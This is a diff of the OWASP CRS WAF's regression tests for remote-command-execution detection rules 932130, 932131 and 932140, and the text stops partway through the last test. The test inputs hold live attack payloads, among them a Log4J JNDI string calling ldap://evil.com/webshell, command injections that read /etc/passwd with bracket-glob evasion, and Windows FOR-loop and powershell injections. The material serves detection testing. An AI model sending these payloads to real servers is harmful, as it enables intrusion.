"932130"' + - test_id: 6 desc: "Log4J exploit picked up by shell exploit detection in body" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${:1337:-x$}{jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${:1337:-x$}{jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: 'id "932130"' + - test_id: 7 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" + version: HTTP/1.0 + output: + log_contains: id "932130" + - test_id: 8 desc: "Unix command injection - character set bypass technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # cat /etc/pa[s]swd - uri: "/get?cmd=cat%20/etc/pa%5Bs%5Dswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # cat /etc/pa[s]swd + uri: "/get?cmd=cat%20/etc/pa%5Bs%5Dswd" + version: HTTP/1.0 + output: + log_contains: id "932130" + - test_id: 9 desc: "Unix command injection - character set bypass technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # cat /[?]tc/pa[?]swd - uri: "/get?cmd=cat%20/%5B%3F%5Dtc/pa%5B%3F%5Dswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # cat /[?]tc/pa[?]swd + uri: "/get?cmd=cat%20/%5B%3F%5Dtc/pa%5B%3F%5Dswd" + version: HTTP/1.0 + output: + log_contains: id "932130" + - test_id: 10 desc: "Unix command injection - character set bypass - negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # hello [text in brackets] - uri: "/get?cmd=hello%20%5Btext%20in%20brackets%5D" - version: HTTP/1.0 - output: - no_log_contains: id "932130" - - test_title: 932130-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # hello [text in brackets] + uri: "/get?cmd=hello%20%5Btext%20in%20brackets%5D" + version: HTTP/1.0 + output: + no_log_contains: id "932130" + - test_id: 11 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/etc/pas[s]wd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/etc/pas[s]wd" + version: HTTP/1.0 + output: + log_contains: id "932130" + - test_id: 12 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/etc/%5Bp%5Dasswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/etc/%5Bp%5Dasswd" + version: HTTP/1.0 + output: + log_contains: id "932130" + - test_id: 13 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/etc/%5B!q%5Dasswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/etc/%5B!q%5Dasswd" + version: HTTP/1.0 + output: + log_contains: id "932130" + - test_id: 14 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/etc/%5Bm-z%5Dasswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/etc/%5Bm-z%5Dasswd" + version: HTTP/1.0 + output: + log_contains: id "932130" + - test_id: 15 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/usr/bin/%5Bu%5Dname+-a" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/usr/bin/%5Bu%5Dname+-a" + version: HTTP/1.0 + output: + log_contains: id "932130" + - test_id: 16 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?exec=/bi%5Bn%5D/bash" - version: HTTP/1.0 - output: - log_contains: id "932130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?exec=/bi%5Bn%5D/bash" + version: HTTP/1.0 + output: + log_contains: id "932130" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml index 378089c7c..155462cee 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml @@ -1,39 +1,36 @@ --- meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "932131.yaml" description: "Tests to trigger or not trigger rule 932131" +rule_id: 932131 tests: - - test_title: 932131-1 + - test_id: 1 desc: Log4J test with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent ${:1337:-x$}{jndi:ldap://evil.com/webshell}" - Host: "localhost" - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "932131" - - test_title: 932131-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent ${:1337:-x$}{jndi:ldap://evil.com/webshell}" + Host: "localhost" + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "932131" + - test_id: 2 desc: False positive against Facebook for Android user agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - User-Agent: "mozilla/5.0(linux android 12 sm-a528b build/sp1a.210812.016 wv) applewebkit/537.36(khtml like gecko) version/4.0 chrome/110.0.5481.154 mobile safari/537.36 [fb_iab/fb4a fbav/403.0.0.27.81 ]" - Host: "localhost" - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "932131" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + User-Agent: "mozilla/5.0(linux android 12 sm-a528b build/sp1a.210812.016 wv) applewebkit/537.36(khtml like gecko) version/4.0 chrome/110.0.5481.154 mobile safari/537.36 [fb_iab/fb4a fbav/403.0.0.27.81 ]" + Host: "localhost" + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "932131" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml index a105ef47d..b7dff9301 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml @@ -2,2540 +2,2381 @@ meta: author: "fgsch, azurit" description: Tests for Windows for command - enabled: true - name: 932140.yaml +rule_id: 932140 tests: - - test_title: 932140-1 + - test_id: 1 desc: for % stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%25variable%20in%20%28set%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%25variable%20in%20%28set%29%20do%20command" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 2 desc: for %% stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%25%25variable%20in%20%28set%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%25%25variable%20in%20%28set%29%20do%20command" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 3 desc: for /d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2fd%20%25variable%20in%20%28set%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2fd%20%25variable%20in%20%28set%29%20do%20command" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 4 desc: for /r stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2fr%20c%3a%5c%20%25variable%20in%20%28set%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2fr%20c%3a%5c%20%25variable%20in%20%28set%29%20do%20command" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 5 desc: for /l stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2fl%20%25variable%20in%20%281%2c1%2c2%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2fl%20%25variable%20in%20%281%2c1%2c2%29%20do%20command" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 6 desc: for /f .. fileset stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28fileset%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28fileset%29%20do%20command" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 7 desc: for /f .. "string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%22string%22%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%22string%22%29%20do%20command" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 8 desc: for /f .. 'command' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%27command%27%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%27command%27%29%20do%20command" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 9 desc: for /f .. `command` stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2ff%20%22usebackq%22%20%25variable%20in%20%28%60command%60%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-10 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%7Cfor+%2Ff+%22delims%3D%22+%25i+in+%28%27cmd+%2Fc+%22powershell.exe+-InputFormat+none+write+%27FJQPVY%27.length%22%27%29+do+if+%25i%3D%3D6+%28cmd+%2Fc+%22powershell.exe+-InputFormat+none+Start-Sleep+-s+2%22%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-11 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR++++++++++++++%25a+IN+%28set%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-12 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FD+++++++++++%25a+IN+%28dirs%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-13 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FD+%2FD++++++++%25a+IN+%28dirs%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-14 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28text%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-15 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28%22text%22%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-16 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FL+++++++++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-17 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FL+%2FL+%2FL+++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-18 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FR+C%3A%5Cbla++++%25A+IN+%28set%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-19 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+for+%25a+in+%28a%2Cb%2Cc%29+do+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-20 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%25a+IN+%28a%2Cb%2Cc%29+DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-21 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25_+IN+%28a%2Cb%2Cc%29+DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-22 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%252+IN+%28a%2Cb%2Cc%29+DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-23 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25-+IN+%28a%2Cb%2Cc%29+DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-24 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%2F+IN+%28a%2Cb%2Cc%29+DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-25 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%40+IN+%28a%2Cb%2Cc%29DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-26 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%5B+IN+%28a%2Cb%2Cc%29DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-27 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%5D+IN+%28a%2Cb%2Cc%29DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-28 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%7E+IN+%28a%2Cb%2Cc%29DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-29 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25A+IN+%28%22jejeje+brbr%22%29+DO+%40echo+pwnd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-30 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25%25A+IN+++%28%22jejeje+brbr%22%29+DO+%40echo+pwnd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-31 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+%28%27SET%27%29+DO+%40Echo+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-32 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-33 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - 